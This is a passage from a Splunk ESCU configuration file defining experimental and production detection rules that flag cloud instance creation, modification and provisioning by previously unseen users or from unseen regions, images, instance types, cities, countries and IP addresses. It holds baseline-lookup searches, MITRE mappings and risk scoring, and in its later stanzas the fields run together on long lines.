action.escu.creation_date = 2021-07-13
action.escu.modification_date = 2021-07-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - Cloud Compute Instance Created By Previously Unseen User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Cloud Cryptomining"]
action.risk = 1
action.risk.param._risk_message = User $user$ is creating a new instance $dest$ for the first time
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 18}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 18}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Cloud Compute Instance Created By Previously Unseen User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object) as dest from datamodel=Change where All_Changes.action=created by All_Changes.user All_Changes.vendor_region | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_compute_creations_by_user user as user OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUser=min(firstTimeSeen) | where isnull(firstTimeSeenUser) OR firstTimeSeenUser > relative_time(now(), "-24h@h") | table firstTime, user, dest, count vendor_region | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_by_previously_unseen_user_filter`

[ESCU - Cloud Compute Instance Created In Previously Unused Region - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks at cloud-infrastructure events where an instance is created in any region within the last hour and then compares it to a lookup file of previously seen regions where instances have been created.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search looks at cloud-infrastructure events where an instance is created in any region within the last hour and then compares it to a lookup file of previously seen regions where instances have been created.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Regions - Initial` to build the initial table of regions observed and times. You must also enable the second baseline search `Previously Seen Cloud Regions - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_in_previously_unused_region_filter` macro.
action.escu.known_false_positives = It's possible that a user has unknowingly started an instance in a new region. Please verify that this activity is legitimate.
action.escu.creation_date = 2020-09-02
action.escu.modification_date = 2020-09-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - Cloud Compute Instance Created In Previously Unused Region - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Cloud Cryptomining"]
action.risk = 1
action.risk.param._risk_message = User $user$ is creating an instance $dest$ in a new region for the first time
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Cloud Compute Instance Created In Previously Unused Region - Rule
action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats earliest(_time) as firstTime latest(_time) as lastTime values(All_Changes.object_id) as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.vendor_region, All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_regions vendor_region as vendor_region OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenRegion=min(firstTimeSeen) | where isnull(firstTimeSeenRegion) OR firstTimeSeenRegion > relative_time(now(), "-24h@h") | table firstTime, user, dest, count, vendor_region | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_in_previously_unused_region_filter`

[ESCU - Cloud Compute Instance Created With Previously Unseen Image - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects potential instances that are created in a cloud computing environment using new or unknown image IDs that have not been seen before. This detection is important because it helps to investigate and take appropriate action to prevent further damage or unauthorized access to the Cloud environment, which can include data breaches, unauthorized access to sensitive information, or the deployment of malicious payloads within the cloud environment. False positives might occur since legitimate instances can also have previously unseen image IDs. Next steps include conducting an extensive triage and investigation to determine the nature of the activity. During triage, review the details of the created instances, including the user responsible for the creation, the image ID used, and any associated metadata. Additionally, consider inspecting any relevant on-disk artifacts and analyzing concurrent processes to identify the source of the attack.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = The following analytic detects potential instances that are created in a cloud computing environment using new or unknown image IDs that have not been seen before. This detection is important because it helps to investigate and take appropriate action to prevent further damage or unauthorized access to the Cloud environment, which can include data breaches, unauthorized access to sensitive information, or the deployment of malicious payloads within the cloud environment. False positives might occur since legitimate instances can also have previously unseen image IDs. Next steps include conducting an extensive triage and investigation to determine the nature of the activity. During triage, review the details of the created instances, including the user responsible for the creation, the image ID used, and any associated metadata. Additionally, consider inspecting any relevant on-disk artifacts and analyzing concurrent processes to identify the source of the attack.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Compute Images - Initial` to build the initial table of images observed and times. You must also enable the second baseline search `Previously Seen Cloud Compute Images - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_with_previously_unseen_image_filter` macro.
action.escu.known_false_positives = After a new image is created, the first systems created with that image will cause this alert to fire. Verify that the image being used was created by a legitimate user.
action.escu.creation_date = 2018-10-12
action.escu.modification_date = 2018-10-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - Cloud Compute Instance Created With Previously Unseen Image - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Cloud Cryptomining"]
action.risk = 1
action.risk.param._risk_message = User $user$ is creating an instance $dest$ with an image that has not been previously seen.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Cloud Compute Instance Created With Previously Unseen Image - Rule
action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as dest from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.image_id, All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")` | where image_id != "unknown" | lookup previously_seen_cloud_compute_images image_id as image_id OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenImage=min(firstTimeSeen) | where isnull(firstTimeSeenImage) OR firstTimeSeenImage > relative_time(now(), "-24h@h") | table firstTime, user, image_id, count, dest | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_with_previously_unseen_image_filter`

[ESCU - Cloud Compute Instance Created With Previously Unseen Instance Type - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the creation of EC2 instances with previously unseen instance types. The detection is made by using a Splunk query to identify the EC2 instances. First, the query searches for changes in the EC2 instance creation action and filters for instances with instance types that are not recognized or previously seen. Next, the query uses the Splunk tstats command to gather the necessary information from the Change data model. Then, it filters out instances with unknown instance types and compares the remaining instance types against those previously seen to determine whether they are new. The detection is important because it identifies attackers attempting to create instances with unknown or potentially compromised instance types, which can be an attempt to gain unauthorized access to sensitive data, compromise systems, exfiltrate data, disrupt services, or launch other malicious activities within the environment. False positives might occur since there might be legitimate reasons for creating instances with previously unseen instance types. Therefore, you must carefully review and triage all alerts.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = The following analytic detects the creation of EC2 instances with previously unseen instance types. The detection is made by using a Splunk query to identify the EC2 instances. First, the query searches for changes in the EC2 instance creation action and filters for instances with instance types that are not recognized or previously seen. Next, the query uses the Splunk tstats command to gather the necessary information from the Change data model. Then, it filters out instances with unknown instance types and compares the remaining instance types against those previously seen to determine whether they are new. The detection is important because it identifies attackers attempting to create instances with unknown or potentially compromised instance types, which can be an attempt to gain unauthorized access to sensitive data, compromise systems, exfiltrate data, disrupt services, or launch other malicious activities within the environment. False positives might occur since there might be legitimate reasons for creating instances with previously unseen instance types. Therefore, you must carefully review and triage all alerts.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Compute Instance Types - Initial` to build the initial table of instance types observed and times. You must also enable the second baseline search `Previously Seen Cloud Compute Instance Types - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_with_previously_unseen_instance_type_filter` macro.
action.escu.known_false_positives = It is possible that an admin will create a new system using a new instance type that has never been used before. Verify with the creator that they intended to create the system with the new instance type.
action.escu.creation_date = 2020-09-12
action.escu.modification_date = 2020-09-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - Cloud Compute Instance Created With Previously Unseen Instance Type - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Cloud Cryptomining"]
action.risk = 1
action.risk.param._risk_message = User $user$ is creating an instance $dest$ with an instance type $instance_type$ that has not been previously seen.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Cloud Compute Instance Created With Previously Unseen Instance Type - Rule
action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.instance_type, All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")` | where instance_type != "unknown" | lookup previously_seen_cloud_compute_instance_types instance_type as instance_type OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenInstanceType=min(firstTimeSeen) | where isnull(firstTimeSeenInstanceType) OR firstTimeSeenInstanceType > relative_time(now(), "-24h@h") | table firstTime, user, dest, count, instance_type | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_with_previously_unseen_instance_type_filter`

[ESCU - Cloud Instance Modified By Previously Unseen User - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for cloud instances being modified by users who have not previously modified them.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search looks for cloud instances being modified by users who have not previously modified them.
action.escu.how_to_implement = This search depends on other searches to create and update a baseline of users observed to be associated with this activity. The search "Previously Seen Cloud Instance Modifications By User - Update" should be enabled for this detection to work properly.
action.escu.known_false_positives = It's possible that a new user will start to modify EC2 instances when they haven't before, for any number of reasons. Verify with the user that is modifying instances that this is the intended behavior.
action.escu.creation_date = 2020-07-29
action.escu.modification_date = 2020-07-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - Cloud Instance Modified By Previously Unseen User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious Cloud Instance Activities"]
action.risk = 1
action.risk.param._risk_message = User $user$ is modifying an instance $object_id$ for the first time.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Cloud Instance Modified By Previously Unseen User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as object_id values(All_Changes.command) as command from datamodel=Change where All_Changes.action=modified All_Changes.change_type=EC2 All_Changes.status=success by All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_instance_modifications_by_user user as user OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUser=min(firstTimeSeen) | where isnull(firstTimeSeenUser) OR firstTimeSeenUser > relative_time(now(), "-24h@h") | table firstTime user command object_id count | `security_content_ctime(firstTime)` | `cloud_instance_modified_by_previously_unseen_user_filter`

[ESCU - Cloud Provisioning Activity From Previously Unseen City - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for cloud provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that runs or creates something.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search looks for cloud provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that runs or creates something.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP addresses, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_city_filter` macro.
action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.
action.escu.creation_date = 2020-10-09
action.escu.modification_date = 2020-10-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Cloud Provisioning Activity From Previously Unseen City - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious Cloud Provisioning Activities"]
action.risk = 1
action.risk.param._risk_message = User $user$ is starting or creating an instance $object$ for the first time in City $City$ from IP address $src$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 18}, {"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "object", "risk_object_type": "system", "risk_score": 18}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Cloud Provisioning Activity From Previously Unseen City - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(City) | lookup previously_seen_cloud_provisioning_activity_sources City as City OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenCity=min(firstTimeSeen) | where isnull(firstTimeSeenCity) OR firstTimeSeenCity > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, City, user, object, command | `cloud_provisioning_activity_from_previously_unseen_city_filter` | `security_content_ctime(firstTime)`

[ESCU - Cloud Provisioning Activity From Previously Unseen Country - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for cloud provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that runs or creates something.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search looks for cloud provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that runs or creates something.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP addresses, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_country_filter` macro.
action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.
action.escu.creation_date = 2020-10-09 action.escu.modification_date = 2020-10-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Provisioning Activity From Previously Unseen Country - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = User $user$ is starting or creating an instance $object$ for the first time in Country $Country$ from IP address $src$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}, {"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "object", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cloud Provisioning Activity From Previously Unseen Country - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(Country) | 
lookup previously_seen_cloud_provisioning_activity_sources Country as Country OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenCountry=min(firstTimeSeen) | where isnull(firstTimeSeenCountry) OR firstTimeSeenCountry > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, Country, user, object, command | `cloud_provisioning_activity_from_previously_unseen_country_filter` | `security_content_ctime(firstTime)` [ESCU - Cloud Provisioning Activity From Previously Unseen IP Address - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for cloud provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search looks for cloud provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_ip_address_filter` macro. 
action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. action.escu.creation_date = 2020-08-16 action.escu.modification_date = 2020-08-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Provisioning Activity From Previously Unseen IP Address - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = User $user$ is starting or creating an instance $object_id$ for the first time from IP address $src$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}, {"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "object_id", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cloud Provisioning Activity From 
Previously Unseen IP Address - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime, values(All_Changes.object_id) as object_id from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.command | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_provisioning_activity_sources src as src OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenSrc=min(firstTimeSeen) | where isnull(firstTimeSeenSrc) OR firstTimeSeenSrc > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, user, object_id, command | `cloud_provisioning_activity_from_previously_unseen_ip_address_filter` | `security_content_ctime(firstTime)` [ESCU - Cloud Provisioning Activity From Previously Unseen Region - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for cloud provisioning activities from previously unseen regions. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search looks for cloud provisioning activities from previously unseen regions. 
Provisioning activities are defined broadly as any event that runs or creates something. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_region_filter` macro. action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. 
action.escu.creation_date = 2020-08-16 action.escu.modification_date = 2020-08-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Provisioning Activity From Previously Unseen Region - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = User $user$ is starting or creating an instance $object$ for the first time in region $Region$ from IP address $src$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}, {"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "object", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cloud Provisioning Activity From Previously Unseen Region - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | 